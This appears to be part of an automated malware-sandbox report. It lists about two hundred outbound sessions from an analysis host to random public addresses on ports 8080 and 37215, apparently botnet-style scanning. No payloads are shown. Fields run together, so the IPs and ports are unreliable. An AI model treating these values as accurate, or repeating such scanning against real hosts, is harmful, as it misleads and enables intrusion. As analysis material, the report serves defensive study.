                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4386192.168.2.235942625.228.241.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4387192.168.2.235199845.179.239.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4388192.168.2.234480417.128.19.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4389192.168.2.234867450.158.114.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4390192.168.2.2360532216.209.163.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4391192.168.2.235949213.161.147.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4392192.168.2.2336968160.104.101.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4393192.168.2.2356756117.253.115.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4394192.168.2.233876496.64.97.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4395192.168.2.2346090135.89.37.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4396192.168.2.235731864.215.161.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4397192.168.2.2348644182.209.208.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4398192.168.2.2335562101.69.84.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4399192.168.2.2340510136.163.249.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4400192.168.2.2337508145.179.81.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4401192.168.2.234109617.71.133.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4402192.168.2.234271273.166.39.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4403192.168.2.2351296123.85.5.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4404192.168.2.2335052113.91.137.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4405192.168.2.2346714130.42.166.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4406192.168.2.2342366100.209.245.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4407192.168.2.2360114100.26.8.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4408192.168.2.2356150150.21.255.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4409192.168.2.2351418177.181.92.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4410192.168.2.2339134155.176.224.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4411192.168.2.233692084.154.126.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4412192.168.2.2357164193.202.73.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4413192.168.2.233711047.144.59.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4414192.168.2.2358388199.131.4.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4415192.168.2.2334084181.25.208.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4416192.168.2.2358332137.103.151.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4417192.168.2.2358346156.28.79.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4418192.168.2.234181225.187.76.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4419192.168.2.2339178177.159.164.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4420192.168.2.2340564159.182.139.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4421192.168.2.2353230158.18.184.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4422192.168.2.2336132140.188.221.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4423192.168.2.235141237.222.50.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4424192.168.2.233904670.154.231.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4425192.168.2.2346314108.224.122.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4426192.168.2.2350980115.158.154.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4427192.168.2.235675891.96.250.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4428192.168.2.2353158117.180.16.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4429192.168.2.2354374212.191.216.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4430192.168.2.2357082123.185.107.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4431192.168.2.234436019.41.103.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4432192.168.2.2358816195.67.124.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4433192.168.2.2352676160.102.46.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4434192.168.2.2349648177.122.212.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4435192.168.2.2351036212.106.102.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4436192.168.2.2345834164.118.84.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4437192.168.2.2341208213.200.185.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4438192.168.2.234704473.57.180.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4439192.168.2.2350298152.221.236.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4440192.168.2.2339494187.11.135.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4441192.168.2.2348758133.15.16.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4442192.168.2.233749480.210.236.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4443192.168.2.2335996123.120.97.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4444192.168.2.233966438.192.166.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4445192.168.2.2334614200.209.176.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4446192.168.2.2358620137.174.23.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4447192.168.2.2357058200.200.124.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4448192.168.2.2349512197.67.87.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4449192.168.2.234598646.149.105.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4450192.168.2.235755483.121.192.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4451192.168.2.2341732213.47.182.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4452192.168.2.2343288189.52.121.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4453192.168.2.235640019.93.134.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4454192.168.2.233991290.15.40.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4455192.168.2.2333148197.64.166.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4456192.168.2.2346322170.248.212.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4457192.168.2.2348598197.19.105.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4458192.168.2.2351396157.104.17.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4459192.168.2.2340534140.67.98.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4460192.168.2.233946241.148.92.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4461192.168.2.2341592182.75.29.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4462192.168.2.234389041.197.116.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4463192.168.2.235873841.173.207.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4464192.168.2.2354098157.20.86.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4465192.168.2.2333032146.229.159.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4466192.168.2.2351578157.214.154.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4467192.168.2.2338176147.153.218.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4468192.168.2.2360342197.102.254.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4469192.168.2.235065041.24.225.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4470192.168.2.234016041.255.52.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4471192.168.2.2358362197.133.50.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4472192.168.2.233969641.218.99.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4473192.168.2.233463441.19.242.22637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4474192.168.2.2338462157.106.78.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4475192.168.2.2340316157.104.73.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4476192.168.2.234179841.151.225.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4477192.168.2.2340312197.242.244.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4478192.168.2.2335294197.192.40.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4479192.168.2.233589898.76.196.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4480192.168.2.2353560197.96.146.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4481192.168.2.235199041.174.140.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4482192.168.2.23424264.185.139.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4483192.168.2.235919246.63.141.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4484192.168.2.2336602197.154.2.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4485192.168.2.235561441.123.240.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4486192.168.2.235818241.255.52.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4487192.168.2.2346446157.75.221.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4488192.168.2.233346841.253.66.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4489192.168.2.2344392157.115.151.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4490192.168.2.2337218180.5.135.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4491192.168.2.235158641.246.6.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4492192.168.2.2360838157.154.198.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4493192.168.2.233719041.78.206.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4494192.168.2.2336728197.150.101.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4495192.168.2.233303841.109.182.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4496192.168.2.2335856157.212.75.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4497192.168.2.234371241.87.76.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4498192.168.2.2355930197.81.202.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4499192.168.2.2336804197.239.144.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4500192.168.2.2335800151.158.196.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4501192.168.2.2345082197.248.179.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4502192.168.2.2351168152.55.194.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4503192.168.2.2340792157.148.194.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4504192.168.2.2335230197.138.226.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4505192.168.2.235304641.109.64.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4506192.168.2.2352014165.251.49.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4507192.168.2.234157641.82.219.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4508192.168.2.2333500157.202.55.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4509192.168.2.236096041.4.241.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4510192.168.2.2354510128.8.20.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4511192.168.2.2337570157.215.129.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4512192.168.2.234906041.44.90.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4513192.168.2.2350296197.144.83.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4514192.168.2.234259041.232.107.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4515192.168.2.2342208157.154.210.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4516192.168.2.2337434157.13.253.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4517192.168.2.2354082202.141.72.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4518192.168.2.2342026157.240.195.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4519192.168.2.2358542157.242.61.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4520192.168.2.2335492197.65.240.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4521192.168.2.2355150197.244.227.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4522192.168.2.235664441.118.159.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4523192.168.2.2339990189.2.181.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4524192.168.2.2339586157.177.110.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4525192.168.2.233631041.129.138.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4526192.168.2.2356086197.124.225.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4527192.168.2.235054239.151.158.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4528192.168.2.2341460146.178.217.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4529192.168.2.2342216197.115.190.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4530192.168.2.2357662157.81.158.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4531192.168.2.2346702197.125.227.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4532192.168.2.235210017.6.205.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4533192.168.2.2342766197.143.252.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4534192.168.2.2337452197.174.194.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4535192.168.2.2344404197.199.127.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4536192.168.2.2344912197.192.199.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4537192.168.2.2356622197.200.70.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4538192.168.2.235757841.215.217.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4539192.168.2.2347820157.57.189.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4540192.168.2.2352972115.241.1.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4541192.168.2.2347726157.163.86.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4542192.168.2.2348750197.210.31.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4543192.168.2.2350904157.209.21.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4544192.168.2.2353578197.38.234.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4545192.168.2.2356558197.3.92.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4546192.168.2.2339952197.226.169.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4547192.168.2.234089841.151.91.12737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4548192.168.2.234189641.138.161.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4549192.168.2.2333932186.239.128.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4550192.168.2.2344834197.203.182.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4551192.168.2.234934041.73.136.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4552192.168.2.234736665.113.217.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4553192.168.2.233635687.81.255.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4554192.168.2.2347792197.48.83.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4555192.168.2.2351406197.136.43.2037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4556192.168.2.2333500123.161.231.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4557192.168.2.233886227.194.174.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4558192.168.2.233728641.18.127.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4559192.168.2.2356454197.170.165.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4560192.168.2.236054441.134.18.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4561192.168.2.2342714197.84.198.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4562192.168.2.2348432190.48.2.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4563192.168.2.235928873.191.178.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4564192.168.2.2352216220.145.113.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4565192.168.2.235815037.234.231.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4566192.168.2.235949489.80.92.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4567192.168.2.2340734123.254.58.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4568192.168.2.2357440109.137.163.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4569192.168.2.2348524212.170.106.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4570192.168.2.2354542107.93.133.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4571192.168.2.234884292.54.174.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4572192.168.2.233799652.138.18.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4573192.168.2.2350234187.241.3.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4574192.168.2.2349168171.194.51.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4575192.168.2.2334062166.228.69.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4576192.168.2.2357010223.134.199.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4577192.168.2.2348256123.91.51.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4578192.168.2.234061442.38.19.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4579192.168.2.2334050219.113.183.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4580192.168.2.234097866.147.47.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4581192.168.2.2339154138.102.133.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4582192.168.2.235377480.131.212.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4583192.168.2.2340742134.4.58.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4584192.168.2.2357098129.137.51.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4585192.168.2.2347800110.234.139.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4586192.168.2.2342790104.83.179.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4587192.168.2.2345150116.48.65.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4588192.168.2.2338940147.246.138.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4589192.168.2.2335332190.172.85.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4590192.168.2.2354126101.41.127.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4591192.168.2.234192252.85.177.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4592192.168.2.234557261.113.200.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4593192.168.2.2333028186.78.137.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4594192.168.2.2350564212.69.220.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
